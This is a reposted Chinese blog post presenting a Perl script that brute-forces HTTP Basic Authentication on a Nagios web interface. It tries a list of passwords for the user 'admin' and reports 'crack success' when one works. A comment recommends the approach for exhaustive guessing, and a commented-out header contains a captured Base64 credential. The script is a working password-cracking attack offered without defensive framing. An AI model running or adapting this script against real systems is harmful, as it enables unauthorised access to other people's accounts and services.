博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Perl脚本Basic Authentication方法
阅读量:6392 次
发布时间:2019-06-23

本文共 1559 字,大约阅读时间需要 5 分钟。

Perl脚本Basic Authentication方法

 
  1. #!/usr/bin/perl 
  2.  
  3. use strict; 
  4. use warnings; 
  5. use HTTP::Request; 
  6. use LWP::UserAgent; 
  7. use Data::Dumper; 
  8. use Getopt::Std; 
  9.  
  10. my %options = (); 
  11. getopt("d:",\%options); 
  12.  
  13. my $debug = $options{d} || 0; 
  14.  
  15. my @password_array = qw(ken jack sunny ben kick); 
  16.  
  17. &main(@password_array); 
  18.  
  19.  
  20.  
  21. sub main { 
  22.     foreach my $password (@_) { 
  23.         my $status = &get_url($password); 
  24.         if ($status == 1) { 
  25.                 last; 
  26.         } 
  27.     } 
  28.  
  29.  
  30. sub get_url { 
  31.     my $password = shift; 
  32.  
  33.     my $ua; 
  34.     my $req; 
  35.     my $res; 
  36.  
  37.     my $url = 'http://192.168.4.40:8010/nagios'
  38.      
  39.     $ua = LWP::UserAgent->new
  40.     $ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070309 Firefox/2.0.0.3'); 
  41.     $ua->timeout(5); 
  42.      
  43.     $req = HTTP::Request->new( GET => $url ); 
  44.     #方法1:使用Firefox登陆这个Url输入用户密码时抓包,将密文抓下来。贴在下面 
  45.     #$req->header("Authorization" => 'Basic bW9ua3R4cep1Y3dlYl9tb25pdG9y'); 
  46.     #方法2:可以直接输入用户名和密码,适合进行穷举时使用 
  47.     $req->authorization_basic('admin', $password); 
  48.      
  49.     $res = $ua->request($req); 
  50.     print "************************** content begin **************************\n" if $debug; 
  51.     print $res->content . "\n" if $debug; 
  52.     print "************************** content end **************************\n" if $debug; 
  53.      
  54.     print '*************************** Dumper $res ***************************' . "\n" if $debug; 
  55.     print Dumper $res if $debug; 
  56.     print '*************************** Dumper $res ***************************' . "\n" if $debug; 
  57.      
  58.     if ($res->is_success) { 
  59.         print "crack success,password: " . $password . "\n"
  60.         return 1; 
  61.     } else { 
  62.         print "crack fail,password: " . $password . "\n"
  63.         return 0; 
  64.     } 

      本文转自fine102 51CTO博客,原文链接:http://blog.51cto.com/gzmaster/396643,如需转载请自行联系原作者

你可能感兴趣的文章
前端面试题
查看>>
Python的赋值、浅拷贝、深拷贝
查看>>
用python操作mysql数据库(之代码归类)
查看>>
ArcGIS Server 10.1 SP1连续查询出现Unable to complete operation错误
查看>>
执行./configure报checking for g++... no错误
查看>>
Dojo学习笔记(十一):Dojo布局——嵌套样例
查看>>
Appium for Android元素定位方法
查看>>
pfSense LAGG(链路聚合)设置
查看>>
教学思路SQL之入门习题《学生成绩》 七.存储过程基础知识
查看>>
createrepo 无法使用解决
查看>>
.net安全类库
查看>>
在Windows 2008 R2上部署SCCM 2007 R2
查看>>
tablespace backup模式一个没用的技术
查看>>
PostgreSQL安装
查看>>
七牛实时音视频云视频连线demo(web部分)
查看>>
Mysql 权限
查看>>
Spring事务管理(详解+实例)
查看>>
ubuntu apt-get install 出现无法定位软件包...
查看>>
centos7 下 基于docker搭建java/tomcat (方式一)
查看>>
全世界最好的编辑器VIM之Windows配置(gvim)[未测试]
查看>>